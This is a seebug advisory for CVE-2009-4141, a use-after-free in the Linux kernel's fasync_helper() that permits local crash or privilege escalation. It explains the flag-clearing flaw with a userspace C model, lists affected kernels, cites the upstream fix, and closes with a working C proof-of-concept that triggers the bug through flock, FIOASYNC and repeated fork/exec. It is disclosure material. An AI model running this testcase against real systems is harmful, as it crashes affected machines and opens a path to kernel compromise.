seebug SSV:18949

Linux Kernel 'fasync_helper()' local privilege escalation vulnerability

Published: 2010-01-16 00:00:00
Author: Root
Source: www.seebug.org
EPSS: 0.0004 (Low), percentile 0.4%

Bugtraq ID: 37806
CVE ID: CVE-2009-4141

Linux is an open-source operating system.
The Linux kernel has a security vulnerability in its handling of file descriptors that are both locked and marked for asynchronous notification (fasync); it allows a local attacker to execute arbitrary code with kernel privileges or to crash the system.
According to Linus's analysis: "The problem is that the same file descriptor can be on multiple fasync lists. It can be on a particular fasync list only once, but file locking is special: it uses the 'fl->fl_fasync' list to add arbitrary files to its own fasync list, regardless of whatever underlying device driver or other thing is involved."
The problem is that fasync_helper() incorrectly assumes a file can be on at most one fasync list, so it clears the FASYNC flag on every removal call, even when the file was not on the list being searched:
http://lxr.linux.no/#linux+v2.6.30.4/fs/fcntl.c#L566
When the file descriptor is closed for the last time and the file is released, FASYNC is no longer set, so the file is not removed from the other fasync list it is still on, leaving that list with a dangling reference to the freed structure.
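To make the flag-clearing mistake concrete, here is a userspace model of the fasync_helper() lifecycle described above. It is an added example, not code from seebug or from the kernel: struct file, struct fasync_struct and fasync_helper_model() are simplified stand-ins with the same shape as the kernel structures, replay_close() replays the sequence the testcase further down drives (FIOASYNC, then a close that tears down the file lock before the driver is asked to unsubscribe), and the `fixed` argument switches between clearing FASYNC on every removal call (the vulnerable behaviour) and clearing it only when an entry was actually unlinked from the list (the behaviour the referenced upstream fix introduces). The list ownership, call ordering and flag value are modelling assumptions, not quotes of kernel code.

```c
/* Userspace model of the CVE-2009-4141 fasync lifecycle. Not kernel code. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define FASYNC_BIT 0x2000   /* stand-in for the FASYNC bit in f_flags */

struct file {
    unsigned f_flags;
};

/* Stand-in for struct fasync_struct: one node per subscribed file */
struct fasync_struct {
    struct file *fa_file;
    struct fasync_struct *fa_next;
};

/*
 * Model of fasync_helper(fd, filp, on, fapp) from fs/fcntl.c (2.6.30 era).
 * clear_only_if_removed == false mirrors the vulnerable code: an on==0 call
 * clears FASYNC whether or not the file was on this particular list.
 * clear_only_if_removed == true mirrors the fix: FASYNC is cleared only when
 * an entry was actually unlinked.
 */
static int fasync_helper_model(struct file *filp, int on,
                               struct fasync_struct **fapp,
                               bool clear_only_if_removed)
{
    struct fasync_struct *fa, **fp;
    int result = 0;

    for (fp = fapp; (fa = *fp) != NULL; fp = &fa->fa_next) {
        if (fa->fa_file != filp)
            continue;
        if (!on) {
            *fp = fa->fa_next;   /* unlink and free this file's entry */
            free(fa);
            result = 1;
        }
        goto out;
    }
    if (on) {
        fa = malloc(sizeof *fa);
        fa->fa_file = filp;
        fa->fa_next = *fapp;
        *fapp = fa;
        result = 1;
    }
out:
    if (on)
        filp->f_flags |= FASYNC_BIT;
    else if (!clear_only_if_removed || result)
        filp->f_flags &= ~FASYNC_BIT;
    return result;
}

/* True if any node on `list` still points at `filp` */
static bool list_references(const struct fasync_struct *list, const struct file *filp)
{
    for (; list; list = list->fa_next)
        if (list->fa_file == filp)
            return true;
    return false;
}

/*
 * Replays the sequence behind the testcase (modelling assumption about order):
 *   1. ioctl(FIOASYNC): the driver puts the file on its own fasync list.
 *   2. close(): the file lock is torn down first, and lock teardown calls
 *      fasync_helper(.., on=0, &fl->fl_fasync) unconditionally.
 *   3. The final release only asks the driver to unsubscribe if FASYNC is
 *      still set on the file.
 * Returns true if the driver's list still references the file when the file
 * is released, i.e. a dangling reference survives.
 */
static bool replay_close(bool fixed)
{
    struct fasync_struct *driver_list = NULL;   /* e.g. the /dev/urandom list */
    struct fasync_struct *fl_fasync = NULL;     /* the file lock's own list */
    struct file *filp = malloc(sizeof *filp);
    filp->f_flags = 0;

    fasync_helper_model(filp, 1, &driver_list, fixed);      /* step 1 */
    fasync_helper_model(filp, 0, &fl_fasync, fixed);        /* step 2 */
    if (filp->f_flags & FASYNC_BIT)                         /* step 3 */
        fasync_helper_model(filp, 0, &driver_list, fixed);

    bool dangling = list_references(driver_list, filp);
    free(filp);   /* file released; a surviving node now points at freed memory */

    while (driver_list) {   /* release the model's leftover nodes */
        struct fasync_struct *next = driver_list->fa_next;
        free(driver_list);
        driver_list = next;
    }
    return dangling;
}

int main(void)
{
    printf("vulnerable helper leaves a dangling entry: %s\n", replay_close(false) ? "yes" : "no");
    printf("fixed helper leaves a dangling entry:      %s\n", replay_close(true) ? "yes" : "no");
    return 0;
}
```

The point of the model is the `else if` in fasync_helper_model(): with the unconditional clear, the lock teardown in step 2 wipes the flag even though the file was never on fl_fasync, so step 3 skips the driver and the driver's list keeps a pointer to the freed file; tying the clear to an actual removal keeps the flag and the list membership in sync.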

Affected versions:

Linux kernel 2.6.33-rc4
Linux kernel 2.6.32
Linux kernel 2.6.32-rc8
Linux kernel 2.6.32-rc7
Linux kernel 2.6.32-rc5
Linux kernel 2.6.32-rc4
Linux kernel 2.6.32-rc3
Linux kernel 2.6.32-rc2
Linux kernel 2.6.32-rc1
Linux kernel 2.6.31.11
Linux kernel 2.6.31.6
Linux kernel 2.6.31.5
Linux kernel 2.6.31.4
Linux kernel 2.6.31.2
Linux kernel 2.6.31.1
Linux kernel 2.6.31
Linux kernel 2.6.31-git11
Linux kernel 2.6.31-rc9
Linux kernel 2.6.31-rc8
Linux kernel 2.6.31-rc7
Linux kernel 2.6.31-rc6
Linux kernel 2.6.31-rc5-git3
Linux kernel 2.6.31-rc4
Linux kernel 2.6.31-rc3
Linux kernel 2.6.31-rc2
Linux kernel 2.6.31-rc1
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.30.1
Linux kernel 2.6.30
Linux kernel 2.6.30-rc6
Linux kernel 2.6.30-rc5
Linux kernel 2.6.30-rc3
Linux kernel 2.6.30-rc2
Linux kernel 2.6.30-rc1
Linux kernel 2.6.29.4
Linux kernel 2.6.29.1
Linux kernel 2.6.29
Linux kernel 2.6.29-git14
Linux kernel 2.6.29-git8
Linux kernel 2.6.29-git1
Linux kernel 2.6.29-rc2-git1
Linux kernel 2.6.29-rc2
Linux kernel 2.6.29-rc1
Linux kernel 2.6.28.10
Linux kernel 2.6.28.9
Linux kernel 2.6.28.8
Linux kernel 2.6.28.6
Linux kernel 2.6.28.5
Linux kernel 2.6.28.4
Linux kernel 2.6.28.3
Linux kernel 2.6.28.2
Linux kernel 2.6.28.1
Linux kernel 2.6.28
Linux kernel 2.6.28-git7
Linux kernel 2.6.28-rc7
Linux kernel 2.6.28-rc5
Linux kernel 2.6.28-rc1

Distribution packages listed as affected:
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
Vendor solution
Users can refer to the following upstream commit for patch information:
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=53281b6d34d44308372d16acb7fb5327609f68b6

#ifndef _GNU_SOURCE
# define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <stdbool.h>
#include <fcntl.h>
#include <stdlib.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/file.h>     /* flock() */
#include <sys/ioctl.h>    /* ioctl() */
#include <sys/wait.h>     /* waitpid() */
#include <asm/ioctls.h>   /* FIOASYNC */

// Testcase for locked async fd bug -- taviso 16-Dec-2009
// Run as an unprivileged user. On an affected kernel the stale fasync entry
// left behind by close() is eventually dereferenced (crash); on a fixed
// kernel the loop simply runs until fork() or waitpid() fails.
int main(int argc, char **argv)
{
    int fd;
    pid_t child;
    unsigned flag = ~0;

    (void)argc;
    (void)argv;

    fd = open("/dev/urandom", O_RDONLY);
    if (fd < 0) {
        fprintf(stderr, "open() failed, %m\n");
        return 1;
    }

    // set up exclusive lock, but dont block
    // (tearing this lock down on close is what clears FASYNC on the file)
    flock(fd, LOCK_EX | LOCK_NB);

    // set ASYNC flag on descriptor: puts the file on /dev/urandom's fasync list
    ioctl(fd, FIOASYNC, &flag);

    // close the file descriptor to trigger the bug: the lock is released first,
    // FASYNC is cleared, and the final release never takes the file off the
    // driver's fasync list
    close(fd);

    // now exec some stuff to populate the AT_RANDOM entries, which will cause
    // the released file to be used.

    // This assumes /bin/true is an elf executable, and that this kernel
    // supports AT_RANDOM.
    do switch (child = fork()) {
            case  0: execl("/bin/true", "/bin/true", (char *)NULL);
                     abort();
            case -1: fprintf(stderr, "fork() failed, %m\n");
                     break;
            default: fprintf(stderr, ".");
                     break;
    } while (waitpid(child, NULL, 0) != -1);

    fprintf(stderr, "waitpid() failed, %m\n");
    return 1;
}